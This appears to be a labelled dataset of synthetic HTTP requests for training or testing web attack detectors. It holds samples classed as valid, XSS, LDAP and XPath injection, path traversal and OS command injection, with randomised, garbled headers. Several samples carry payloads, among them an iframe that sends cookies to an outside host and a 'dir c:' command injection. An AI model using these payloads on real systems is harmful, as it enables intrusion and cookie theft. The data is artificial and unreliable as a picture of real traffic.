~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45180
Start - Id: 27539
class: Valid
GET /sW8bufr_Ed/tlgndScLTgf5NMSG.Vf4/zII9pn_TE1hXAY./pmmsvrdxaeaN.tiff?aaptt=%3Cmi&nh=slaA&Mrec=8vaheosn8ae&meOry=3543&saMe25yt=nanitlit&s6riipa=bihprdzytiaT HTTP/1.0
Host: 54.70.47.4
Connection: keep-alive
Accept: text/*;q=0.1, application/rtf;q=0.0, audio/*
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 252.13.177.85
Cookie: e6=62 otoWwel;tsch1os5ortI3=De ansmesAh;uueNiadzrae=hcopyrns;7NEn=)[bopsi'EeL6ucmd2h
Cookie2: $Version="154"
Date: Tue, 23 May 06 06:15:29 GMT
ETag: "lJAZn6MnyN6kzs@@c18p"
Expect: 100-continue
From: ru4em6@gcCndrd.cz
If-Modified-Since: Wed, 16 Apr 08 02:27:40 GMT
If-Unmodified-Since: Fri, 24 Nov 06 19:56:56 UTC
If-Match: *
If-None-Match: *
If-Range: "BeUnN4T_4ikAvf7"
Max-Forwards: 0026
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: htrtl efzt=gadB
Range: -46102,418194-41076
Referer: /ihait/eoIy/Attmna/ra0Emng2.pdf
TE: trailers,trailers,gzip
Trailer: Max-Forwards
User-Agent: Mozilla/6.6 (Windows; U; WinNT 7.5; tt-nc; rv:0.2.3) Gecko/81498740
UA-CPU: PowerPC
UA-Disp: 883,733,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 412x989
Via: djieeh/5.3 www.I7ys.gif, 9.5 www.tuFhxtji.js
Transfer-Encoding: tjcora; wa6hn=Ces1fAc
Upgrade: Npnao/5.5, 7inei/1.4, 1fe/9.6
Warning: 807 www.tHT4nsBw.tiff "eatatio9t9Iq3" 
X-Forwarded-For: 224.28.160.220
X-Serial-Number: 03769
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27539
Start - Id: 23536
class: Valid
GET /NllIrnm/6dMtfI3zn8/bjaraTFelailo/reX/wi1dsh9r9laeIuezqae/519vDhNUJHVHsz2M7/eCMzYB@okHC2N_kl8bm/m4ISf/LZgVupdateW8NG/sjH/t3m.exe?tteibppha=489005 HTTP/1.0
Host: www.eees.org:5
Connection: close
Accept: audio/*;q=0.7, text/xml;q=0.6, video/quicktime
Accept-Charset: isiri-3342;q=0.6, iso-8859-15, cp-950
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: min-fresh=335
Client-ip: 17.236.93.216
Cookie: scieatw=ee 
Cookie2: $Version="254"
Date: Fri, 07 Aug 09 01:31:49 GMT
ETag: W/"sO3QtpkiM.1AmoO8y"
Expect: rfesJ=rznad
From: sateEoa@mrewwclz.be
If-Modified-Since: Mon, 08 Feb 10 03:27:33 UTC
If-Unmodified-Since: Fri, 12 Feb 10 22:24:25 GMT
If-Match: *
If-None-Match: "9i3yaahnSQ.wkUg@XQ"
If-Range: Sat, 31 May 08 02:47:25 CET
Max-Forwards: 50
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: NTLM NWdnYXRodHlpbGV5eXR3Ym5ldW9sZWVlUnZhYW1zZWtkdGlwZWhUbWlzYXNp
Authorization: Digest realm
Range: 8-461044,5-
Referer: /iagu/cf9rtrWt/No1ynt/hEshlhh.swf
TE: trailers,chunked
Trailer: Referer
User-Agent: Mozilla/0.8 (X11; U; Unix 6.3; 4a-nt; rv:5.6.8) Gecko/52359624
UA-CPU: StrongARM
UA-Disp: 3395,981,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 4426x0282
Via: 1.6 www.3pwu.js:73475, dus/6.8 www.Huse7u.html, 5.1 www.iavoTmgA.js
Transfer-Encoding: identity
Upgrade: spef/8.1, nqu/3.7, aNy/6.5, ete8/2.7
Warning: 266 191.138.56.230:98 "diio" "Tue, 17 Apr 07 03:38:46 CET"
X-Forwarded-For: 224.154.235.176
X-Serial-Number: 467341
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 23536
Start - Id: 44659
class: PathTransversal
GET /iQformAMmdL_IRpassthru.dll? HTTP/1.1
Host: 56.196.67.62:80
Connection: close
Accept: audio/*;q=0.0, image/*;q=0.0, video/mpeg;q=0.2
Accept-Charset: euc-kr;q=0.7, x-mac-cyrillic, windows-1255;q=0.0, x-mac-chinesetrad, windows-874;q=0.0
Accept-Encoding: *;q=0.7
Accept-Language: pRauin-PIre;q=0.2, oenle0-wolew, nswaot-kE;q=0.6
Cache-Control: no-transform
Client-ip: 16.130.45.174
Cookie: sKtuittasyo8td=045;7VvOSCS1=2708886;ipenj=yyebody;tqe8y=./.././../
Cookie2: $Version="1"
Date: Tue, 02 Feb 10 09:28:18 UTC
ETag: "mtEFtYFGB7-eDudMIO1A"
Expect: meuhstee
From: fIfg@eoiOetgSo.fr
If-Modified-Since: Sat, 19 May 07 01:36:25 CET
If-Unmodified-Since: Tue, 12 Jul 05 05:58:05 UTC
If-Match: *
If-None-Match: "rq31P3rY4BBAkGD0wJP"
If-Range: *
Max-Forwards: 4576
Pragma: no-cache
Proxy-Authorization: eaowfh leeewnas=9Iy2e
Authorization: Digest realm
Range: 73929-1,-1308,686-
Referer: http://wi5dh.com/dfb2esn/tjHAsT/ntk5gu.bin
TE: deflate;q=0.3,trailers,trailers
Trailer: Connection
User-Agent: Mozilla/4.6 (Machintosh; U; PPC Mac OS X 3.7; nn-ta; rv:6.4.4) Gecko/22820311
UA-CPU: MIPS
UA-Disp: 508,1015,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 6252x9424
Via: 6.0 www.nC8a.gif, 9.8 19.147.75.108, HTTP/2.0 215.212.80.183
Transfer-Encoding: deflate
Upgrade: ervl/3.1, rWat5n/5.8
Warning: 131 252.145.208.111 "ieondrt" "Sun, 10 Aug 08 22:40:38 GMT"
X-Serial-Number: 0781889348466
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44659
Start - Id: 48283
class: XSS
PUT /dm9T.nsf? HTTP/1.1
Content-Length: 282
Content-Language: vuoaYb1y
Content-Encoding: identity
Content-Location: /lahaeonm/rjuua/pzs8otqo/8teagh.mdb
Content-MD5: cDdEZGtucWRFVWFyaG5pcw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 01 May 06 06:23:30 UTC
Last-Modified: Tue, 26 Jul 05 04:55:46 UTC
Host: 98.7.101.141
Connection: keep-alive
Accept: text/*;q=0.0
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: 5i-erx;q=0.0, uroqem-9;q=0.2
Cache-Control: no-cache
Client-ip: 194.139.58.173
Cookie: vkiE0oullutcE1=tR1dbsIisae;2etaediwasLTbfo=<form+name=hElNx ><select+name=pwwa >http://www.ulouT.com/bofer/?</select ></form>;eirp8=geoebody;maogsIonfnr8aei=7976;tthifo=oowl8adsde
Cookie2: $Version="589"
Date: Thu, 06 Dec 07 04:16:52 CET
ETag: W/"164Ncu4AP.BYqPAi8"
Expect: sthK
If-Modified-Since: Mon, 06 Jun 05 18:51:23 UTC
If-Unmodified-Since: Sat, 12 Mar 05 06:29:31 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 03 Sep 08 05:14:55 GMT
Max-Forwards: 5
MIME-Version: 0.9
Pragma: uvp='xnosst'
Authorization: Digest uri=/6LhEmta.mpg
Range: -23954,652-
Referer: http://www.exFccgnr.be/4tiaH/iMepwhx/eRbEj8ei/thae/niru.dll
TE: deflate
Trailer: Accept-Encoding
User-Agent: tdnQTb http://www.aytians.be
UA-Disp: 5100,8264,8
UA-OS: Windows 98
Via: 4.0 www.t1ntlN.jpeg
Transfer-Encoding: n1o2
Upgrade: 11ssaf/1.6, zAt/4.0, AaEt/1.6, 7sg/3.8
Warning: 062 59.37.73.19 "Srtle8yh9Tentv" "Tue, 09 Mar 04 19:30:59 GMT"
X-Forwarded-For: 255.63.175.191
X-Serial-Number: 994751
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

ee=positioni i&IhSeogte1o=cmocha1e&gepMP=34226699&nienb=01378273&numsjrh=n|hoe&en=7306&adfethowa0saw=yS6&rodilIsaoeCgai=irtat&etcgdiz=n5kkahj8&WgmailQa=73127197&gYhaving8hhEoptExorinput=zAIvl&liawtnlrodeteao=3as8 ozIlriii1e&KscriptHAqF9NakS=QshTb ;&kco=ergzoWiernmq&mexsv=wqo9wx

End - Id: 48283
Start - Id: 38848
class: LdapInjection
GET /nraat4h1tL6a/FeincludeDv/UFbobjectfexec4lsU2/tpWrYFMO.gmcr8..Bf/sL.0xh-kKtgWyfs2/rJP2b/%uVsQC3acceptHLZ.js?eecstt=as%29%28%26%28objectClass+++%3D+e3*%29&hd1hehbdndp1sf=hd0tta HTTP/1.1
Host: 64.220.48.110:18
Connection: iiieldo
Accept: audio/*, text/*;q=0.4
Accept-Charset: *
Accept-Encoding: compress, gzip;q=0.1, compress;q=0.3, gzip;q=0.5, identity
Accept-Language: mqe0Dtog-nsl6eeT;q=0.2, ffh-nirtS;q=0.4, goRe1sT-dsz, ws-o, aautrdh-0Rti
Cache-Control: max-age=56
Client-ip: 149.133.119.108
Cookie: lseeyuiiwtptim=iri:sMns;HdGW1Sd=8072;w6dorennRn=sSvnifihlltii;eitYateccnWe=Ntvtcqelvns4i
Cookie2: $Version="36"
Date: Fri, 21 Jan 05 20:06:52 GMT
ETag: "wRJ@LeH28t9WJmteX1"
Expect: beeepata=O503do;rmagetie
From: heIinnsa@oahcE7tm6m.cz
If-Modified-Since: Sun, 02 Jan 05 14:48:27 UTC
If-Unmodified-Since: Tue, 14 Apr 09 11:48:35 CET
If-Match: "A9HmJ9nfB4HDx6x"
If-None-Match: "@nXv3OGmTIP_@ISF56U"
If-Range: Tue, 25 Apr 06 21:32:26 UTC
Max-Forwards: 3
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: c24d hfsait=shshcn
Range: -390702,-162,16550-
Referer: /ntftiom.txt
TE: trailers
Trailer: Via
User-Agent: HteobeHze (hg_gBw3dx; eTHQLJJh@R; neft-p; nCzeFR)
UA-CPU: 68000
UA-Disp: 1599,031,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 072x4241
Via: 2.1 www.i8ptj.html
Transfer-Encoding: identity
Upgrade: O88/7.9, ieosN/1.3, eTtno/0.5, aah/4.6
Warning: 313 www.NteEt.png "Pcgrneh6n" "Fri, 24 Jul 09 11:00:14 GMT"
X-Forwarded-For: 220.205.21.58
X-Serial-Number: 74857144808284221
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 38848
Start - Id: 46617
class: XSS
GET /ekTkukJb/yttantrytstetfm/qU3T5documenty/tsjoiohrhh3sf/IiR1brbiSame/eu70_3v/XyB@En.jpeg?hpteifpnWuapIjb=n&oRgCjjSqBrX=9577322&jDZ0iexecIt=%2Ba+cakesia&0U7UbvDocT=4471705&https5lE@=S&GntroobAtel=3452&idH=e.Pwye5Qv&AOYDLRF=HC%26m2reFxconnectliae&@7hKdeleteH_4jphp=ezG5Ss5AH%40I&tiEdcxpt=arabmwnt7gli&sw2siuoisreta=httshIl&hHuEnweqgrip=7980&rttia=le6hbeatoarwfrokf HTTP/1.0
Host: www.m9jNcebin.biz
Connection: chiaeepl
Accept: */*;q=0.6
Accept-Charset: macintosh;q=0.6
Accept-Encoding: <iframe    src   =  "     vbscript:[document.location.replace   ('http://www.iltingor.com/cgi-bin/nenselet.cgi'+document.cookie);]  "   >
Accept-Language: zaz-0;q=0.5
Cache-Control: max-stale=3699
Client-ip: 230.114.98.187
Cookie: g6aocn=3304725;atitasbejitvh=efuleze9hpben;eyncb=pinsa;n76iEpt1eea1r=4415528938
Cookie2: $Version="96"
Date: Thu, 08 Jan 09 22:25:44 CET
ETag: "_ek5GFvMhnXVSDU6b"
Expect: 100-continue
From: itwrt@4wirn.uk
If-Modified-Since: Sat, 25 Jul 09 12:14:04 CET
If-Unmodified-Since: Sun, 22 Apr 07 14:49:08 GMT
If-Match: "b-FuryhPv9jU2pMW"
If-None-Match: "LrjgmSYV3Hth1w2"
If-Range: Tue, 06 Oct 09 08:12:26 UTC
Max-Forwards: 2186
MIME-Version: 3.6
Pragma: tvler50=rehdhipj
Proxy-Authorization: Digest response="d90C7D93CfbC9371Fdd2DB9114D0Bc1d"
Authorization: Basic Y2VUZW9qOnN0a3Jv
Range: 7283-8
Referer: /DatgAce4.sh
TE: gzip,gzip;q=0.4,gzip;q=0.8
Trailer: TE
User-Agent: Mozilla/4.7 (Windows; U; Windows NT 7.4; 7t-le; rv:9.1.9) Gecko/05138359
UA-CPU: PowerPC
UA-Disp: 7714,181,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 950x529
Via: 6.0 www.gohtm3zz.css, 6.7 www.abtha.png:7, 1.8 22.102.132.242
Transfer-Encoding: deflate
Upgrade: 1ssnt/2.7, Necil/0.4
Warning: 749 169.197.175.54 "aTaul8Deeyii" "Wed, 21 Apr 04 19:11:25 GMT"
X-Forwarded-For: 245.134.55.175
X-Serial-Number: 24556
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46617
Start - Id: 10066
class: Valid
GET /h9TNbs6ARkdaOFohyd.pl?eiafwtaTts=if4eaf5Ttiy&Pdrop06=3&coiigf=io8o5aaSmr8i0eex&eua7cM3rt=9667911&adme7qTvftR=%5Datn&rboon=098469&bEih5LDea=wtIDbLq.0G&rNNv3unk3ldeRh=8249291&Pgjo=zmailk%2Fiqrepwi%295sebta&0Cx@bZtmp.XNgi=i8SunSrOae HTTP/1.1
Host: 73.63.17.101:12
Connection: close
Accept: audio/x-wav, application/zip, video/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: eh-mEef, tSaaha-Ia;q=0.0, hfi-i1lwaaed, noik-9thlenn, e1re-l;q=0.3
Cache-Control: max-age=08
Client-ip: 104.169.228.37
Cookie: Chissh=a\iS
Cookie2: $Version="93"
Date: Sat, 24 Apr 10 07:03:05 CET
ETag: W/"fZL-CgdQBuZcfNUqK"
Expect: lxltoMtt=olvdcho;8ecooa=lrlnd
From: aemYeste@u736nnw.biz
If-Modified-Since: Sun, 18 Oct 09 12:48:30 GMT
If-Unmodified-Since: Mon, 09 Feb 04 07:49:28 CET
If-Match: *
If-None-Match: "DSCC59jVe2Um5sKzr"
If-Range: Sun, 27 Aug 06 17:43:08 GMT
Max-Forwards: 4027
MIME-Version: 4.0
Pragma: rezph='b0ecodt'
Proxy-Authorization: flkeb doigltee=bandt
Authorization: Basic azEzaWg6c1lmNXg=
Range: 0143-8
Referer: http://fworptn.net/setm/Nrlqr1a.php
TE: deflate;q=0.0,trailers
Trailer: Host
User-Agent: Mozilla/3.3 (Machintosh; U; PPC 3.6; cu-9g; rv:1.7.7) Gecko/47744524
UA-CPU: 68000
UA-Disp: 046,3752,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 6453x8240
Via: osgsr/4.0 www.gatlrwn.tiff, 0.9 www.Tttb0q.jpeg:2824
Transfer-Encoding: identity
Upgrade: dioExt/5.6, 5ost/5.4
Warning: 334 201.54.73.174:7 "ostm1" 
X-Forwarded-For: 189.69.165.224
X-Serial-Number: 905480693565962672
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10066
Start - Id: 7959
class: Valid
PUT /processing-instructionkrfRBkLGI3/QT.script/Yp/pu1ah4/eND@g.qCA/omCFv-WduhUJ_/aLg-i/XQHWuHV0NSeval/nauGf8YIdRVLJc.jpg? HTTP/1.0
Content-Length: 169
Content-Language: eeTs
Content-Encoding: gzip
Content-Location: http://rone.biz/lommhao/ri1noow/ih9cgP.sh
Content-MD5: OUwydG1hRWFhdG5ubXBubA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 28 May 07 01:59:53 UTC
Last-Modified: Mon, 17 Aug 09 19:05:42 CET
Host: 149.222.24.144
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: windows-1254, x-mac-ce, windows-1253;q=0.1
Accept-Encoding: 
Accept-Language: e7hy-weaaad, larvmi-c, iep-its;q=0.7
Cache-Control: no-transform
Client-ip: 196.208.163.141
Cookie: rqrF5uGK1=m8ccS23o;openDh14gZ05EZ=rs0;ata2kn=2;bmerbctonnatth=5 t dkh?0vvE p
Cookie2: $Version="9"
Date: Thu, 08 Apr 10 01:11:05 GMT
ETag: W/"OtIb4q6xgkVt7XZZXA"
Expect: 100-continue
From: uyh9nAn@dvblu.it
If-Modified-Since: Sat, 21 May 05 04:56:43 CET
If-Unmodified-Since: Thu, 08 Jul 04 14:47:41 CET
If-Match: "PWQOIhncFgBWo4mrw"
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: oflNee nlaOdeea=dr6s
Authorization: Digest username="Asf3axr"
Range: -57827,6032-4
Referer: http://ionOee.st/cbIltFno/tj1t4tna/sdea.msf
TE: trailers,trailers,deflate;q=0.2
Trailer: Cache-Control
User-Agent: Mozilla/6.0 (X11; U; Open BSD i386 6.4; e9-bs; rv:5.2.7) Gecko/52196843
UA-CPU: MIPS
UA-Disp: 250,771,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 094x6003
Via: 9.6 www.bvnnex.js, HTTP/0.8 101.80.146.183, 0.3 21.6.48.1
Transfer-Encoding: deflate
Upgrade: rRndxQ/4.8, m7j2ro/0.4, xec/7.9, aPodde/0.0, lld/6.5
Warning: 024 www.O7oep.htm "aennnrtyleRmrdHsfeP" "Wed, 26 May 04 05:12:06 CET"
X-Forwarded-For: 88.220.41.73
X-Serial-Number: 56493
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

nesoi=762&aetLl3=ayn&uynfvoeucond=35019&xOiZZM@M=29623002&2T5oPR1oeeeans=enmts7a3t&s4esUt=nph-i&dsaw=aci(metakmetaouaode?r&x_ohtacceslogIVO-V4H=5642957&aecyivX4lQ=84

End - Id: 7959
Start - Id: 49036
class: XPathInjection
GET /hp7KL/tdiohorhaavcdh/r01bbYZ_QhewjQ-p4/nhum5sYugttaed/vupotiE/wrzcDdylYEKROeKBO3Ty/elMzNN8DPbDxcjr88/I-G4usrXIOuece/deoaushSran/8R.css?mter2nrHih=y.rGQsLGcrNG&s5t0th=e1mZse&Rraasou=OLvarwsjwec%24aeec2Cs%5D&3haaoeoh=%28i++++%3C+++count%28clthS%2Fchild%3A%3Atext%28%29%29++++and+++++j++++%3C+++count%28st%2Fchild%3A%3Acomment%28%29%29+++and++++k+%3C+++++count%28we9c%2Fchild%3A%3A*%29+%29&qtddggwib=fonyerntnalo HTTP/1.1
Host: 92.246.84.41:80
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *;q=0.9
Accept-Encoding: compress;q=0.7
Accept-Language: ok-tt3iic, l-ocna;q=0.6, zwhkehn-scs8Xohr;q=0.3, po-Yts;q=0.6, ylo1-awrdeywc
Cache-Control: no-cache
Client-ip: 176.183.31.155
Cookie: tan=j1bg3tWRH;jUdi=Mhcmailbaouyoa4rh;eBrcorahs=aabodyisoa 2cul3es:;s0EfeoesT=aeANuiM4serviceshe;tm4iediagzuukm=tb3aoa>updateswp-
Cookie2: $Version="246"
Date: Sun, 06 Dec 09 23:21:30 CET
ETag: "lvJg@fQtPGfZPSNn"
Expect: asneEri=oe6du;Oioao=uoxeyx
From: oc6etY@0uezaiml.cz
If-Modified-Since: Mon, 16 Jun 08 16:19:34 CET
If-Unmodified-Since: Sat, 01 Aug 09 24:58:17 UTC
If-Match: "cIQuoJ25kCk@xzR9"
If-None-Match: "5RjGOh8LcKVKM5_F1h6"
If-Range: Fri, 20 Feb 04 16:46:50 GMT
Max-Forwards: 895
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: Basic MVRudG9zYjpnb2VzbmU=
Authorization: Digest realm
Range: -31
Referer: /ssrtig0/e6ta.tiff
TE: gzip;q=0.3,trailers,trailers
Trailer: Via
User-Agent: Mozilla/6.5 (compatible; MSIE 0.1; WinNT; moya; sdeh)
UA-CPU: StrongARM
UA-Disp: 081,2723,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 1840x9062
Via: 0.8 www.4didh7.css
Transfer-Encoding: nsuaH; 3s9hHi=neitt
Upgrade: sfltc/9.5, Llja/5.6
Warning: 508 www.oxoelcbt.shtml "eseoaeasajz" 
X-Forwarded-For: 25.112.255.42
X-Serial-Number: 00114
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49036
Start - Id: 43750
class: OsCommanding
GET ..�../..�../mssql7/install/pubtext.bat" & dir c: .exe? HTTP/1.1
Host: 39.90.105.203
Connection: I6qwa
Accept: video/*, text/*, image/*
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: no-store
Client-ip: 251.209.185.79
Cookie: 177system4YAi5=514;u2n9blpeD5=2295257394;ocoH=0776;hdzgiodpwAfew=mB dtesnph-systemaa~ y
Cookie2: $Version="88"
Date: Tue, 07 Feb 06 10:07:39 UTC
ETag: W/"S2kqKS2NgMYdq_Ze"
Expect: fe8gaSr=na4I2h
From: Reoco@amlrswscus.de
If-Modified-Since: Wed, 29 Jul 09 03:01:36 GMT
If-Unmodified-Since: Sat, 14 Mar 09 15:03:08 GMT
If-Match: "1GH--iKf_fhk5Nb1."
If-None-Match: *
If-Range: Tue, 19 Oct 04 05:08:13 GMT
Max-Forwards: 2434
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: naeven zndoO=eonsiuNe
Authorization: NTLM ZTRubDJ0c3NQOW9BVTNzc2llc2VpdGR1SnRyZXB1dHdt
Range: 2335-
Referer: http://www.n2bnMo.gov/djiih/eo9srs82.jsp
TE: deflate;q=0.0,trailers,deflate;q=0.6
Trailer: Max-Forwards
User-Agent: Mozilla/6.2 (Windows; U; Win98 7.3; eT-sh; rv:0.2.1) Gecko/19031906
UA-CPU: Sparc
UA-Disp: 624,195,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 7271x959
Via: FTP/9.0 241.198.167.113, naqf/9.5 www.etcod.js
Transfer-Encoding: compress
Upgrade: 2Ytn/5.0, a8qtt/0.1
Warning: 960 13.127.188.120 "eVdond" 
X-Forwarded-For: 247.183.255.17
X-Serial-Number: 36260359600073
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 43750
Start - Id: 38392
class: LdapInjection
GET /gaice9RiCOb/nnmimiit3sy/oAxQ4G67yqDGGAfiQMx/bSrcpZmochaUTPcvbscript5@b/eYz6EGWT.jsp?lszEehwheTen=aItp&na=%3Fo%5Bainputeo29&teczOeitdnRsso=y9eTu&twitb=union%3A%7Cf&coo10dnalaStm=3&dnaorta=%29++++%28+%7C+++%28++++cn%3D*o++++%27brien*++%29%28mail+%3D*o++%27brien*+%29 HTTP/1.1
Host: 96.230.80.161
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: iso-2022-kr
Accept-Encoding: identity;q=0.1, compress;q=0.9, deflate;q=0.3, gzip
Accept-Language: *
Cache-Control: no-cache
Client-ip: 198.17.15.97
Cookie: ouioaZuts1l=97
Cookie2: $Version="08"
Date: Wed, 27 Apr 05 06:07:14 UTC
ETag: "fYwZspfNp8.oWly-Njh"
Expect: oWq0o=iRcIeee
From: e3ig@cUsnasr.com
If-Modified-Since: Wed, 23 Mar 05 08:17:11 GMT
If-Unmodified-Since: Sun, 25 Jul 04 08:39:03 CET
If-Match: "q0ZFq7q@ZSa2QEn7AtP"
If-None-Match: *
If-Range: "@kLqjiKycSjv_jy"
Max-Forwards: 3861
MIME-Version: 5.2
Pragma: tc90ZoiY=aiUncnum
Proxy-Authorization: Digest opaque="teJjbis"
Authorization: Basic R25hZU5wOmx0eXM5dA==
Range: 25855-2071
Referer: http://ai4mr0i.de/oochet/x6zto0ne/iaarnae/1twe/Acicttol.nsf
TE: chunked;q=0.2,trailers,chunked;q=0.4
Trailer: If-Range
User-Agent: Howeaemaxf0swTnyels
UA-CPU: Sparc
UA-Disp: 6597,6108,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 6780x4829
Via: FTP/1.6 160.150.147.193, 0.3 40.189.67.2
Transfer-Encoding: gzip
Upgrade: oHser/7.1, outinw/4.0, weeBc/8.7, ngy3/2.0, rTe/9.3
Warning: 055 37.109.157.36 "ihrzacs63o6dhnu3" "Fri, 03 Jun 05 11:23:10 GMT"
X-Forwarded-For: 139.160.46.245
X-Serial-Number: 85165873223938
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38392
Start - Id: 5989
class: Valid
PUT /dseixrosmfitgd/c-zFET9lNZT.htm? HTTP/1.1
Content-Length: 172
Content-Language: w8emhx
Content-Encoding: compress
Content-Location: http://Obiql.biz/edtji.jpg
Content-MD5: bG5taW5yMmVpbHVhaHJybA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 08 Apr 04 10:10:21 CET
Last-Modified: Tue, 29 Jun 04 07:53:50 CET
Host: www.tlEtd7.gov:3
Connection: oregd
Accept: audio/basic;q=0.2
Accept-Charset: iso-8859-1, x-mac-ce;q=0.4
Accept-Encoding: *;q=0.2
Accept-Language: 62t6-neTaSf;q=0.4, s-r;q=0.0, coavu2d-dnNdAwee;q=0.8
Cache-Control: no-store
Client-ip: 155.32.218.110
Cookie: tDAnleepodod=49613;oiprrc=9349;oyyc3llpx4em=4631702;tenshinRweI=e;rimpOdbsh5ai=twp-
Cookie2: $Version="00"
Date: Thu, 27 Jul 06 14:09:31 CET
ETag: "hzkJb88paEDH0-q@S"
Expect: 5rqn=aat9
From: aH2oeaxm@3EiRSay.org
If-Modified-Since: Mon, 24 Jan 05 03:12:26 UTC
If-Unmodified-Since: Tue, 29 May 07 20:47:36 UTC
If-Match: *
If-None-Match: "HvW.I.FMM6vif35CiW"
If-Range: *
Max-Forwards: 5146
MIME-Version: 2.1
Pragma: peeutnn=egT
Proxy-Authorization: Digest nc=691127d9
Authorization: Digest response="7a0cB13ccc8B083b67BdaA0de5D301cf"
Range: 7772-71595
Referer: /ciraEp/79tt.doc
TE: trailers,trailers,deflate
Trailer: If-Range
User-Agent: 0mHemuHa
UA-CPU: PowerPC
UA-Disp: 879,569,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 3062x279
Via: n9naE/7.2 224.195.131.103, HTTP/3.1 87.6.124.241
Transfer-Encoding: drid; d7Aads6=daSgoowo
Upgrade: youh1/6.5
Warning: 923 www.3ronna6a.jpeg "eqymifrtStinkb" 
X-Forwarded-For: 232.218.22.35
X-Serial-Number: 913619752558918
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

eseFip=20&YutlceBbxagt7ol=yoObdiaosom&wr=ns&oraea=Sh9isI2bores h&nsddalrteshfiut=9370&4cmduYZ=879&3SmmX=s&xeaz5resnaoko=oh  &&tnyeneat3y=7copyoauotmochaeef&ofonesr=264202

End - Id: 5989
Start - Id: 4851
class: Valid
PUT /lsy_lHkN_FWSocI/osacapir/xp_WsEtS1FZ-Y5/hejteco1.dll? HTTP/1.0
Content-Length: 20
Content-Language: gX,a,cAj
Content-Encoding: gzip
Content-Location: /Reqomt/o53ionl.php4
Content-MD5: bWFvcWg3N2QxdmV0c3NVYg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 26 Aug 08 12:32:53 GMT
Last-Modified: Tue, 25 May 04 17:21:38 CET
Host: 113.234.144.160
Connection: rAoioi
Accept: image/*, image/*, application/*;q=0.6
Accept-Charset: isiri-3342, euc-kr, koi8
Accept-Encoding: deflate;q=0.9, identity;q=0.2
Accept-Language: *
Cache-Control: no-store
Client-ip: 43.245.121.69
Cookie: ndsnnkApansSym=enepcsElli;yrwksneiRec=62;i9oeqdC=72989047
Cookie2: $Version="95"
Date: Fri, 25 May 07 14:55:52 CET
ETag: "q0j_.QPQiNvZ5COOw"
Expect: 100-continue
From: se9x4ani@iircstnutn.gov
If-Modified-Since: Tue, 22 Nov 05 07:12:55 CET
If-Unmodified-Since: Tue, 20 May 08 17:46:57 UTC
If-Match: "TmP.jHeTg9iFwKykR"
If-None-Match: *
If-Range: "Z-7o_twU9O-0TexL.nax"
Max-Forwards: 7741
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: naIcSN re1rfCoS=bpehrr
Authorization: Digest nonce
Range: -636874,7776-
Referer: http://www.hhhshft.net/EVsrat.js
TE: gzip,trailers
Trailer: Warning
User-Agent: mi90/8.7.1.5.9
UA-CPU: Sparc
UA-Disp: 092,446,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 812x666
Via: 0.6 36.10.84.33, 7.0 192.0.118.116
Transfer-Encoding: deflate
Upgrade: tai/1.2, etrTcE/8.4, bsyg/5.1, coEs/1.6
Warning: 714 www.gNbN.shtml:866 "rlagij2neSygelcdhn9a" "Tue, 10 Mar 09 19:39:56 UTC"
X-Forwarded-For: 119.68.107.192
X-Serial-Number: 688276935690
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

V2bOi6-v=zbislRihoug

End - Id: 4851
Start - Id: 29521
class: Valid
